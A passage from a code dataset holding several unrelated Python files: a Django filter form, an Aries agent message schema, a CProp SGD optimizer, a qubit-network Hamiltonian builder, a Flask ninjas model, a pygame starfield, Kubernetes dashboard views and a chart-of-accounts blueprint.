x.split('=')[1]\n # USER_IDs = []\n if y==\"0\":\n user = User.objects.all()\n print(user)\n else:\n USER_IDs.append(int(y))\n\n print (\"To sa uzytkownicy %s.\" % USER_IDs)\n print (\"To jest aktywnoc ktora przyszla %s.\" % ajax_aktywnosc)\n\n\n if not ajax_aktywnosc:\n AKTYWNOWSCI_IDs = []\n else:\n aktywnosci_dane = ajax_aktywnosc.split('&')\n AKTYWNOWSCI_IDs = []\n print (\"aktywnosci_dane %s.\" % aktywnosci_dane)\n for x in aktywnosci_dane:\n x = x.replace(\"+\", \" \")\n y = x.split('=')[1]\n AKTYWNOWSCI_IDs.append(y)\n # USER_IDs = []\n\n print (\"To sa aktywnosci %s.\" % AKTYWNOWSCI_IDs)\n\n\n\n\n # if y==\"\":\n # user = User.objects.all()\n # print(user)\n # USER_IDs = []\n # for a in user:\n # USER_IDs.append(a.id)\n # print (a.id)\n # return (USER_IDs)\n # else:\n # USER_IDs.append(int(y))\n\n\n\n\n # if ajax_user != \"user=\":\n # user_dane = ajax_user.split('&')\n # USER_IDs = []\n # for x in user_dane:\n # y = x.split('=')[1]\n # USER_IDs.append(int(y))\n # else:\n # user = User.objects.all()\n # USER_IDs = []\n # for x in user:\n # USER_IDs.append(x.id)\n\n\n\n\n # if ajax_aktywnosc != False:\n # dane = ajax_aktywnosc.split(\"&\")\n # AKTYWNOWSCI_IDs =[]\n # for x in dane:\n # x = x.replace(\"+\", \" \")\n # AKTYWNOWSCI_IDs.append(x.split('=')[1])\n # print(x)\n # print (AKTYWNOWSCI_IDs)\n # return(AKTYWNOWSCI_IDs)\n\n # return JsonResponse(dane, safe=False)\n return HttpResponse(AKTYWNOWSCI_IDs, USER_IDs)\n\n\n\nclass UserFilter(django_filters.FilterSet):\n # product_choices = {\n # '': ('---------', ''),\n # 'fresh': ('Fresh', { 'method': 'age_group', 'args': ('fresh', ), }),\n # 'regular': ('Regular', {'method': 'age_group', 'args': ('regular', ), }),\n # 'old': ('Old', {'method': 'age_group', 'args': ('old', ), }),}\n user = django_filters.MultipleChoiceFilter(choices=UZYTKOWNICY)\n aktywnosc = django_filters.MultipleChoiceFilter(choices=AKTYWNOWSCI)\n miejscowosc = django_filters.MultipleChoiceFilter(choices=MIASTA)\n kodpocztowy = django_filters.MultipleChoiceFilter(choices=KODY)\n # miejscowosc = django_filters.ModelMultipleChoiceFilter(queryset=Album.objects.all().values_list('miejscowosc').distinct())\n # miejscowosc = QuerySetFilter(product_choices, label='Product age choices')\n\n termin = django_filters.DateFromToRangeFilter()\n\n\n class Meta:\n model = Album\n fields = ['aktywnosc', 'miejscowosc', 'kodpocztowy', 'termin', 'user']\n\n def __init__(self, *args, **kwargs):\n super(UserFilter, self).__init__(*args, **kwargs)\n\n # def __init__(self, *args, **kwargs):\n # print('to jest init')\n # super(UserFilter, self).__init__(*args, **kwargs)\n # print(\"to jest AKTYWNOWSCI_IDs %s.\" % AKTYWNOWSCI_IDs)\n # print(\"AKTYWNOWSCI_IDs uzytkownikow %s.\" % USER_IDs)\n #\n #\n if USER_IDs == [] and AKTYWNOWSCI_IDs == []:\n print ('AKTYWNOWSCI_IDs jest pusta')\n self.filters['aktywnosc'].extra.update(\n {\n 'choices': AKTYWNOWSCI\n })\n self.filters['miejscowosc'].extra.update(\n {\n 'choices': MIASTA\n })\n self.filters['kodpocztowy'].extra.update(\n {\n 'choices': KODY\n })\n else:\n aktywnosci_temp = []\n for x in USER_IDs:\n x = Album.objects.filter(user_id=x).values_list('aktywnosc', 'aktywnosc').distinct()\n aktywnosci_temp.extend(x)\n # aktywnosci_temp.insert(0, ('','---------') )\n aktywnosci = list(set(aktywnosci_temp))\n self.filters['aktywnosc'].extra.update(\n {\n 'choices': sorted(aktywnosci)\n })\n\n cities = []\n for x in AKTYWNOWSCI_IDs:\n x = Album.objects.filter(aktywnosc=x).values_list('miejscowosc', 'miejscowosc').distinct()\n cities.extend(x)\n print (\"to są miasta %s.\" % cities)\n\n self.filters['miejscowosc'].extra.update(\n {\n 'choices': sorted(cities)\n })\n\n\n\n\n self.filters['kodpocztowy'].extra.update(\n {\n 'choices': []\n })\n\n\n\n\n #\n #\n\n #\n #\n #\n #\n # print(\"aktywnosci w inicie %s.\" % aktywnosci)\n #\n # # if USER_IDs == []:\n # # self.filters['aktywnosc'].extra.update(\n # # {\n # # 'choices': sorted(ZDARZENIA_FILTR)\n # # })\n # # else:\n # # self.filters['aktywnosc'].extra.update(\n # # {\n # # 'choices': sorted(aktywnosci)\n # # })\n #\n # cities = []\n # cities.insert(0, ('','---------') )\n # for x in USER_IDs:\n # x = Album.objects.filter(user_id=x).values_list('miejscowosc', 'miejscowosc').distinct()\n # cities.extend(x)\n # # print (\"to są miasta %s.\" % cities)\n # codes = []\n # for x in USER_IDs:\n # x = Album.objects.filter(user_id=x).values_list('kodpocztowy', 'kodpocztowy').distinct()\n # codes.extend(x)\n # print (codes)\n # if cities == []:\n #\n # # else:\n # self.filters['kodpocztowy'].extra.update(\n # {\n # 'choices': codes\n # })\n #\n #\n # if cities == []:\n # self.filters['miejscowosc'].extra.update(\n # {\n # 'choices': sorted(MIASTALISTA)\n # })\n # else:\n # self.filters['miejscowosc'].extra.update(\n # {\n # 'choices': sorted(cities)\n # })\n\n\n\n\n\n\n\n # print(Album.objects.filter(aktywnosc=AKTYWNOWSCI_IDs[0]).values_list('miejscowosc', 'miejscowosc').distinct())\n # INNEMIASTA = Album.objects.filter(aktywnosc='Wizyta').values_list('miejscowosc', 'miejscowosc').distinct()\n # miejscowosc = django_filters.MultipleChoiceFilter(choices=INNEMIASTA)\n # return(miejscowosc)\n # print(MIASTA)\n # print(miastab)\n # # cos['aktywnosc'].choices = Album.objects.all().values_list(\"miejscowosc\",\"miejscowosc\").distinct()\n # # print(choices)\n #\n # for name, field in self.filters.items():\n # if isinstance(field, django_filters.ChoiceFilter):\n # # Add \"Any\" entry to choice fields.\n # field.extra['choices'] = tuple([(\"\", \"Any\"), ] + list(field.extra['choices']))\n","sub_path":"Viberr-master/music/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":8970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"58631636","text":"\"\"\"Represents the attached message to be included in the connection record.\"\"\"\n\nfrom marshmallow import EXCLUDE, fields\n\nfrom .....messaging.agent_message import AgentMessage, AgentMessageSchema\n\nfrom ..message_types import ATTACHED_MESSAGE\n\n\nclass MessagesAttach(AgentMessage):\n \"\"\"Class representing the attached message.\"\"\"\n\n class Meta:\n \"\"\"Metadata for attached message class.\"\"\"\n\n schema_class = \"MessagesAttachSchema\"\n message_type = ATTACHED_MESSAGE\n\n def __init__(\n self,\n *,\n tx_my_role:str = None,\n tx_their_role:str = None,\n **kwargs\n ):\n \"\"\"\n Initialize the attached message object.\n\n Args:\n tx_my_role: My role in the connection - related to endorsement protocol\n tx_their_role: Their role in the connection - related to endorsement protocol\n \"\"\"\n\n super().__init__(**kwargs)\n\n self.mime_type = \"application/json\"\n\n self.lastmod_time = \"time\"\n\n self.description = \"The roles related to endorsement protocol\"\n\n self.data = {\n \"json\": {\n \"tx_my_role\":[],\n \"tx_their_role\":[]\n },\n } \n\n\nclass MessagesAttachSchema(AgentMessageSchema):\n \"\"\"Attached Message schema class.\"\"\"\n\n class Meta:\n \"\"\"Attached message schema metadata.\"\"\"\n\n model_class = MessagesAttach\n unknown = EXCLUDE\n\n mime_type = fields.Str(required=True)\n lastmod_time = fields.Str(required=True)\n description = fields.Str(required=True)\n data = fields.Dict(required=True)","sub_path":"aries_cloudagent/protocols/connections/v1_0/messages/messages_attach.py","file_name":"messages_attach.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"87117170","text":"import torch\nfrom torch.optim import Optimizer\n\nfrom .cprop_lib import *\n\n\nclass CPropSGD(Optimizer):\n \"\"\"\n CProp-augmented SGD. \n Based on Pytorch's SGD.\n \"\"\"\n def __init__(\n self,\n params,\n lr,\n cprop_beta=0.999,\n cprop_c=1,\n cprop_eps=1e-8,\n cprop_cdf='bft',\n momentum=0,\n dampening=0,\n weight_decay=0,\n nesterov=False,\n ):\n if not 0.0 <= cprop_eps:\n raise ValueError(\"Invalid cprop_eps value: {}\".format(cprop_eps))\n if not 0.0 <= cprop_c:\n raise ValueError(\"Invalid cprop_c value: {}\".format(cprop_c))\n if not 0.0 <= cprop_beta < 1.0:\n raise ValueError(\n \"Invalid cprop_beta parameter: {}\".format(cprop_beta))\n\n if not 0.0 <= lr:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if momentum < 0.0:\n raise ValueError(\"Invalid momentum value: {}\".format(momentum))\n if weight_decay < 0.0:\n raise ValueError(\n \"Invalid weight_decay value: {}\".format(weight_decay))\n\n defaults = dict(\n cprop_beta=cprop_beta,\n cprop_c=cprop_c,\n cprop_eps=cprop_eps,\n cprop_cdf=cprop_cdf,\n lr=lr,\n momentum=momentum,\n dampening=dampening,\n weight_decay=weight_decay,\n nesterov=nesterov,\n )\n if nesterov and (momentum <= 0 or dampening != 0):\n raise ValueError(\n \"Nesterov momentum requires a momentum and zero dampening\")\n super(CPropSGD, self).__init__(params, defaults)\n\n def __setstate__(self, state):\n super(CPropSGD, self).__setstate__(state)\n for group in self.param_groups:\n group.setdefault('nesterov', False)\n\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n\n Arguments:\n closure (callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n beta = group['cprop_beta']\n c = group['cprop_c']\n eps = group['cprop_eps']\n cdf = group['cprop_cdf']\n\n weight_decay = group['weight_decay']\n momentum = group['momentum']\n dampening = group['dampening']\n nesterov = group['nesterov']\n\n for p in group['params']:\n if p.grad is None:\n continue\n d_p = p.grad.data\n state = self.state[p]\n\n # calculate the cprop scales\n s = cprop(state, d_p, beta, c, eps, cdf)\n\n if weight_decay != 0:\n d_p.add_(weight_decay, p.data)\n if momentum != 0:\n param_state = self.state[p]\n if 'momentum_buffer' not in param_state:\n buf = param_state['momentum_buffer'] = torch.clone(\n d_p).detach()\n else:\n buf = param_state['momentum_buffer']\n buf.mul_(momentum).add_(1 - dampening, d_p)\n if nesterov:\n d_p = d_p.add(momentum, buf)\n else:\n d_p = buf\n\n # scale the gradient update\n p.data.addcmul_(-group['lr'], d_p, s)\n\n return loss\n","sub_path":"cprop/cprop_sgd.py","file_name":"cprop_sgd.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271239665","text":"\"\"\"\nCompute the Hamiltonian of the system.\n\"\"\"\nimport itertools\nimport numbers\nimport numpy as np\nimport sympy\n\nimport qutip\nimport theano\nimport theano.tensor as T\n\nfrom .utils import complex2bigreal\n\n\ndef pauli_product(*args):\n \"\"\"\n Return sympy.Matrix object represing product of Pauli matrices.\n\n Examples\n --------\n >>> pauli_product(1, 1)\n Matrix([[0, 0, 0, 1],\n [0, 0, 1, 0],\n [0, 1, 0, 0],\n [1, 0, 0, 0]])\n \"\"\"\n for arg in args:\n try:\n if not 0 <= arg <= 3:\n raise ValueError('Each argument must be between 0 and 3.')\n except TypeError:\n raise ValueError('The inputs must be integers.')\n n_qubits = len(args)\n sigmas = [qutip.qeye(2), qutip.sigmax(), qutip.sigmay(), qutip.sigmaz()]\n output_matrix = [None] * n_qubits\n for idx, arg in enumerate(args):\n output_matrix[idx] = sigmas[arg]\n output_matrix = qutip.tensor(*output_matrix).data.toarray()\n return sympy.Matrix(output_matrix)\n\n\ndef _self_interactions(num_qubits):\n \"\"\"Return the indices corresponding to the self-interactions.\"\"\"\n interactions = []\n for qubit in range(num_qubits):\n for pindex in range(1, 4):\n term = [0] * num_qubits\n term[qubit] = pindex\n interactions.append(tuple(term))\n return interactions\n\n\ndef _pairwise_interactions(num_qubits):\n \"\"\"\n Return the indices corresponding the the pairwise interactions.\n \"\"\"\n interactions = []\n pairs = itertools.combinations(range(num_qubits), 2)\n for qubit1, qubit2 in pairs:\n for pindex1, pindex2 in itertools.product(*[range(1, 4)] * 2):\n term = [0] * num_qubits\n term[qubit1] = pindex1\n term[qubit2] = pindex2\n interactions.append(tuple(term))\n return interactions\n\n\ndef _self_and_pairwise_interactions(num_qubits):\n \"\"\"Return list of all possible one- and two-qubit interactions.\"\"\"\n return _self_interactions(num_qubits) + _pairwise_interactions(num_qubits)\n\n\nclass QubitNetworkHamiltonian:\n \"\"\"Compute the Hamiltonian for the qubit network.\n\n The Hamiltonian can be generated in several different ways, depending\n on the arguments given. Note that `QubitNetworkHamiltonian` is not\n supposed to know anything about ancillae, system qubits and so on.\n This class is only to parse input arguments (interactions, topology\n or sympy expression) in order to extract free symbols and matrix\n coefficients of a whole qubit network. The distinction between\n system and ancillary qubits comes next with `QubitNetwork`.\n\n Parameters\n ----------\n num_qubits : int,\n Number of qubits in the network.\n parameters : string, tuple or list, optional\n If given, it is used to use the parameters in some predefined\n way. Possible values are:\n - 'all': use all 1- and 2-qubit interactions, each one with a\n different parameter assigned.\n - ('all', (...)): use the specified types of intereactions for\n all qubits.\n - list of interactions: use all and only the given interactions.\n \"\"\"\n\n def __init__(self,\n num_qubits=None,\n expr=None,\n free_parameters_order=None,\n interactions=None,\n net_topology=None):\n # initialize class attributes\n self.num_qubits = None # number of qubits in network\n self.matrices = None # matrix coefficients for free parameters\n self.free_parameters = None # symbolic parameters of the model\n self.interactions = None # list of active interactions, if meaningful\n self.net_topology = None\n\n # Extract lists of parameters and matrices to which each is to\n # be multiplied\n if expr is not None:\n self._parse_sympy_expr(expr, free_parameters_order)\n elif interactions is not None:\n self._parse_from_interactions(num_qubits, interactions)\n elif net_topology is not None:\n self._parse_from_topology(num_qubits, net_topology)\n else:\n raise ValueError('One of `expr`, `interactions` or '\n '`net_topology` must be given.')\n\n def _parse_sympy_expr(self, expr, free_parameters_order=None):\n \"\"\"\n Extract free parameters and matrix coefficients from sympy expr.\n \"\"\"\n try:\n if free_parameters_order is not None:\n self.free_parameters = free_parameters_order\n else:\n self.free_parameters = list(expr.free_symbols)\n _len = expr.shape[0]\n except TypeError:\n raise TypeError('`expr` must be a sympy MatrixSymbol object.')\n # initialize the list of matrices to which each parameter is multiplied\n self.matrices = []\n # extract the matrix to which each element is multiplied\n for parameter in self.free_parameters:\n self.matrices.append(expr.diff(parameter))\n # extract and store number of qubits of Hamiltonian\n self.num_qubits = int(np.log2(_len))\n\n def _parse_from_interactions(self, num_qubits, interactions):\n \"\"\"\n Use value of `interactions` to compute parametrized Hamiltonian.\n\n When the Hamiltonian is derived from the `interactions`\n parameter, also the `self.interactions` attribute is filled,\n storing the indices corresponding to the interactions that are\n being used (as opposite to what happens when the Hamiltonian is\n computed from a sympy expression).\n \"\"\"\n def make_symbols_and_matrices(interactions):\n self.free_parameters = []\n self.matrices = []\n for interaction in interactions:\n # create free parameter sympy symbol for interaction\n new_symb = 'J' + ''.join(str(idx) for idx in interaction)\n self.free_parameters.append(sympy.Symbol(new_symb))\n # create matrix coefficient for symbol just created\n self.matrices.append(pauli_product(*interaction))\n # store number of qubits in class\n if num_qubits is None:\n raise ValueError('The number of qubits must be given.')\n else:\n self.num_qubits = num_qubits\n\n if interactions == 'all':\n self.interactions = _self_and_pairwise_interactions(num_qubits)\n # a tuple of the kind `('all', ((1, 1), (2, 2)))` means that all\n # XX and YY interactions, and no others, should be used.\n elif isinstance(interactions, tuple) and interactions[0] == 'all':\n _interactions = _self_and_pairwise_interactions(num_qubits)\n self.interactions = []\n # filter list of interactions using given filter\n mask = [sorted(tup) for tup in interactions[1]]\n for interaction in _interactions:\n no_zeros = sorted([idx for idx in interaction if idx != 0])\n if no_zeros in mask:\n self.interactions.append(interaction)\n elif isinstance(interactions, list):\n self.interactions = interactions\n # store values of symbols and matrices for chosen interactions\n make_symbols_and_matrices(self.interactions)\n\n def _parse_from_topology(self, num_qubits, topology):\n \"\"\"\n Use value of `topology` to compute parametrized Hamiltonian.\n\n The expected value of `topology` is a dictionary like:\n {((1, 2), 'xx'): 'a',\n ((0, 2), 'xx'): 'a',\n ((0, 1), 'zz'): 'b',\n ((1, 2), 'xy'): 'c'}\n or a dictionary like:\n {(0, 1, 1): a,\n (1, 0, 1): a,\n (3, 3, 0): b,\n (0, 1, 2): c}\n where `a`, `b` and `c` are `sympy.Symbol` instances.\n \"\"\"\n self.num_qubits = num_qubits\n self.net_topology = topology\n # ensure that all values are sympy symbols\n all_symbols = [sympy.Symbol(str(symb)) for symb in topology.values()]\n # take list of not equal symbols\n symbols = list(set(all_symbols))\n # we try to sort the symbols, but if they are sympy symbols this\n # will fail with a TypeError, in which case we just give up and\n # leave them in whatever order they come out of `set`\n try:\n symbols = sorted(symbols)\n except TypeError:\n symbols = list(symbols)\n self.free_parameters = symbols\n # parse target tuples so that (2, 2) represents the YY interaction\n target_tuples = []\n for tuple_ in topology.keys():\n if isinstance(tuple_[1], str):\n str_spec = list(tuple_[1])\n new_tuple = [0] * num_qubits\n for idx, char in zip(tuple_[0], str_spec):\n if char == 'x':\n new_tuple[idx] = 1\n elif char == 'y':\n new_tuple[idx] = 2\n elif char == 'z':\n new_tuple[idx] = 3\n else:\n raise ValueError('Only x, y or z are valid.')\n target_tuples.append(tuple(new_tuple))\n else:\n target_tuples.append(tuple_)\n # Extract matrix coefficients for storing\n # The i-th element of `J` will correspond to the\n # interactions terms associated to the i-th symbol listed\n # in `symbols` (after sorting).\n self.matrices = []\n for idx, symb in enumerate(symbols):\n factor = sympy.Matrix(np.zeros((2 ** num_qubits,) * 2))\n for tuple_, label in zip(target_tuples, all_symbols):\n if label == symb:\n factor += pauli_product(*tuple_)\n self.matrices.append(factor)\n\n def get_matrix(self):\n \"\"\"Return the Hamiltonian matrix as a sympy matrix object.\"\"\"\n # final_matrix = sympy.MatrixSymbol('H', *self.matrices[0].shape)\n final_matrix = sympy.Matrix(np.zeros(self.matrices[0].shape))\n for matrix, parameter in zip(self.matrices, self.free_parameters):\n final_matrix += parameter * matrix\n return final_matrix\n","sub_path":"src/qubit_network/hamiltonian.py","file_name":"hamiltonian.py","file_ext":"py","file_size_in_byte":10229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"415597330","text":"from config.mysqlconnection import connectToMySQL\n\nclass ninja:\n def __init__(self, data):\n self.id = data['id']\n self.first_name = data['first_name']\n self.last_name = data['last_name']\n self.age = data['age']\n self.dojo_id = data['dojo_id']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n \n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM ninjas;\"\n results = connectToMySQL('dojos-and-ninjas').query_db(query)\n ninjas = []\n for ninja in results:\n ninjas.append( cls(ninja))\n return ninjas\n\n @classmethod\n def save(cls, data):\n query =\"INSERT INTO ninjas ( first_name, last_name, age, dojo_id, created_at, updated_at) VALUES( %(first_name)s, %(last_name)s, %(age)s, %(dojo_id)s, NOW(), NOW())\"\n returned_id = connectToMySQL('dojos-and-ninjas').query_db(query, data)\n return returned_id\n\n @classmethod\n def get_ninjas_by_dojo_id(cls, data):\n query = \"SELECT * FROM ninjas WHERE dojo_id = %(id)s;\"\n results = connectToMySQL('dojos-and-ninjas').query_db(query, data)\n ninjas = []\n for ninja in results:\n ninjas.append( cls(ninja))\n return ninjas\n","sub_path":"flask_app/models/ninjas.py","file_name":"ninjas.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"361129582","text":"#!/usr/bin/env python\n\nimport random, math, pygame\nfrom pygame.locals import *\nfrom settings import window\n\n#constants\nNUMSTARS = 200\nSTAR_COLOR = 255, 240, 200\nSKY_COLOR = 20, 20, 40\n\n\ndef init_star():\n \"\"\"Creates new star values.\"\"\"\n dir = -random.random()\n velmult = 20\n vel = [dir * velmult, 0]\n return vel, [window.width, random.randrange(window.height)]\n\n\ndef initialize_stars():\n \"\"\"Creates a new starfield.\"\"\"\n stars = []\n for x in range(NUMSTARS):\n star = init_star()\n stars.append(star)\n move_stars(stars)\n return stars\n\n\ndef draw_stars(surface, stars, color):\n \"\"\"Used to draw (and clear) the stars.\"\"\"\n for vel, pos in stars:\n pos = (int(pos[0]), int(pos[1]))\n surface.set_at(pos, color)\n\n\ndef move_stars(stars):\n \"\"\"Animate the star values.\"\"\"\n for vel, pos in stars:\n pos[0] = pos[0] + vel[0]\n pos[1] = pos[1] + vel[1]\n if not 0 <= pos[0] <= window.width:\n vel[:], pos[:] = init_star()\n\n\ndef test():\n \"\"\"Test for starfield.\"\"\"\n random.seed()\n stars = initialize_stars()\n clock = pygame.time.Clock()\n #initialize and prepare screen\n pygame.init()\n screen = pygame.display.set_mode(window)\n pygame.display.set_caption('Starfield test')\n screen.fill(SKY_COLOR)\n\n done = 0\n while not done:\n draw_stars(screen, stars, SKY_COLOR)\n move_stars(stars)\n draw_stars(screen, stars, STAR_COLOR)\n pygame.display.update()\n for e in pygame.event.get():\n if e.type == QUIT or (e.type == KEYUP and e.key == K_ESCAPE):\n done = 1\n break\n clock.tick(50)\n\nif __name__ == '__main__':\n test()\n\n\n","sub_path":"starfield.py","file_name":"starfield.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"74532212","text":"from django.shortcuts import render,redirect\nfrom django.http import JsonResponse\nfrom devops_k8s.k8s import auth_check, self_login_required, load_auth_config, dt_format\nimport hashlib, random\nfrom dashboard.models import User\nfrom kubernetes import client\nfrom dashboard import node_data\n\n@self_login_required\ndef index(request):\n auth_type = request.session.get(\"auth_type\")\n token = request.session.get(\"token\")\n load_auth_config(auth_type, token)\n core_api = client.CoreV1Api()\n\n # 命名空间:ajax从接口获取动态渲染\n # 计算资源(echart):ajax从接口获取动态渲染\n # 存储资源:下面获取,模板渲染\n # 节点状态:下面获取,模板渲染\n\n node_resource = node_data.node_resource(core_api)\n pv_list = []\n for pv in core_api.list_persistent_volume().items:\n pv_name = pv.metadata.name\n capacity = pv.spec.capacity[\"storage\"] # 返回字典对象\n access_modes = pv.spec.access_modes\n reclaim_policy = pv.spec.persistent_volume_reclaim_policy\n status = pv.status.phase\n if pv.spec.claim_ref is not None:\n pvc_ns = pv.spec.claim_ref.namespace\n pvc_name = pv.spec.claim_ref.name\n claim = \"%s/%s\" %(pvc_ns,pvc_name)\n else:\n claim = \"未关联PVC\"\n storage_class = pv.spec.storage_class_name\n create_time = dt_format(pv.metadata.creation_timestamp)\n\n data = {\"pv_name\": pv_name, \"capacity\": capacity, \"access_modes\": access_modes,\n \"reclaim_policy\": reclaim_policy, \"status\": status,\n \"claim\": claim,\"storage_class\": storage_class,\"create_time\": create_time}\n pv_list.append(data)\n\n return render(request, 'index.html', {\"node_resource\": node_resource, \"pv_list\": pv_list})\n\n# 计算资源(echart)\ndef node_resource(request):\n auth_type = request.session.get(\"auth_type\")\n token = request.session.get(\"token\")\n load_auth_config(auth_type, token)\n core_api = client.CoreV1Api()\n\n res = node_data.node_resource(core_api)\n return JsonResponse(res)\n\ndef login(request):\n if request.method == 'POST':\n print(request.POST)\n # 处理token登录\n token = request.POST.get('token')\n if token: # 判断token是否为空\n # 判断token的可用性\n if auth_check(auth_type='token', token=token):\n request.session['is_login'] = True\n request.session['token'] = token\n request.session['auth_type'] = 'token'\n code = 0\n msg = \"登录成功\"\n else:\n code = 1\n msg = \"token无效\"\n else:\n # 处理kubeconfig登录\n file_obj = request.FILES.get('file')\n # 生成一个随机字符串(token), 保存到session, 用于��识登录用户\n token_random = hashlib.md5(str(random.random()).encode()).hexdigest()\n try:\n content = file_obj.read().decode() # bytes to str\n User.objects.create(\n auth_type='kubeconfig',\n token=token_random,\n content=content\n )\n except Exception as e:\n print(e)\n code = 1\n msg = \"文件类型错误\"\n if auth_check(auth_type='kubeconfig', token=token_random):\n request.session['is_login'] = True\n request.session['token'] = token_random\n request.session['auth_type'] = 'kubeconfig'\n code = 0\n msg = \"登录成功\"\n else:\n code = 1\n msg = \"kubeconfig文件无效\"\n result = {'code': code, 'msg': msg}\n return JsonResponse(result)\n return render(request, 'login.html')\n\ndef logout(request):\n request.session.flush()\n return redirect(login)\n\n@self_login_required\ndef export_resource_api(request):\n namespace = request.GET.get('namespace')\n resource = request.GET.get('resource')\n name = request.GET.get('name')\n\n # 认证相关\n auth_type = request.session.get('auth_type')\n token = request.session.get('token')\n load_auth_config(auth_type, token)\n\n core_api = client.CoreV1Api() # namespace,pod,service,pv,pvc\n apps_api = client.AppsV1Api() # deployment,daemonset,statefulset\n net_api = client.NetworkingV1beta1Api() # ingress\n storage_api = client.StorageV1Api() # storage_class\n\n import yaml,json\n\n yaml_str = \"\"\n if resource == 'deployment':\n try:\n res_str = apps_api.read_namespaced_deployment(name=name, namespace=namespace, _preload_content=False).read().decode() # byte -> str\n json_str = json.loads(res_str) # str -> json\n yaml_str = yaml.safe_dump(json_str) # json -> yaml\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'namespace':\n try:\n res_str = core_api.read_namespace(name=name, _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'persistentvolumes':\n try:\n res_str = core_api.read_persistent_volume(name=name, _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'pods':\n try:\n res_str = core_api.read_namespaced_pod(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'daemonset':\n try:\n res_str = apps_api.read_namespaced_daemon_set(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'statefulset':\n try:\n res_str = apps_api.read_namespaced_stateful_set(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'service':\n try:\n res_str = core_api.read_namespaced_service(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'ingress':\n try:\n res_str = net_api.read_namespaced_ingress(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'persistentvolumeclaim':\n try:\n res_str = core_api.read_namespaced_persistent_volume_claim(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'configmap':\n try:\n res_str = core_api.read_namespaced_config_map(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'secret':\n try:\n res_str = core_api.read_namespaced_secret(name=name, namespace=namespace , _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'node':\n try:\n res_str = core_api.read_node(name=name, _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n elif resource == 'replicaset':\n try:\n res_str = apps_api.read_namespaced_replica_set(name=name, namespace=namespace, _preload_content=False).read().decode()\n json_str = json.loads(res_str)\n yaml_str = yaml.safe_dump(json_str)\n except Exception as e:\n code = 1\n msg = e\n else:\n code = 1\n msg = \"未配置%s资源类型!\"%(resource)\n\n code = 0\n msg = \"查看YAML成功!\"\n res = {\"code\":code,\"msg\":msg,\"data\":yaml_str}\n return JsonResponse(res)\n\nfrom django.views.decorators.clickjacking import xframe_options_sameorigin\n\n@self_login_required\n@xframe_options_sameorigin\ndef ace(request):\n namespace = request.GET.get('namespace')\n resource = request.GET.get('resource')\n name = request.GET.get('name')\n\n data = {}\n data['namespace'] = namespace\n data['resource'] = resource\n data['name'] = name\n\n return render(request, 'ace.html', {'data':data})","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"560440546","text":"from flask import render_template, request, redirect, url_for, Blueprint\nfrom flask_wtf import Form\nfrom pacioli import app, db, forms, models\n\nconfigure_blueprint = Blueprint('configure', __name__,\ntemplate_folder='templates')\n\n@configure_blueprint.route('/')\ndef index():\n return redirect(url_for('configure.chart_of_accounts'))\n\n@configure_blueprint.route('/ChartOfAccounts')\ndef chart_of_accounts():\n classificationform = forms.NewClassification()\n accountform = forms.NewAccount()\n subaccountform = forms.NewSubAccount()\n elements = models.Elements.query.all()\n return render_template(\"chart_of_accounts.html\",\n elements=elements,\n classificationform=classificationform,\n accountform=accountform,\n subaccountform=subaccountform)\n\n@configure_blueprint.route('/ChartOfAccounts/AddClassification', methods=['POST','GET'])\ndef add_classification():\n if request.method == 'POST':\n form = request.form.copy().to_dict()\n name = form['classification']\n parent = form['classificationparent']\n parent = models.Elements.query.filter_by(id=parent).one()\n parent = parent.name\n classification = 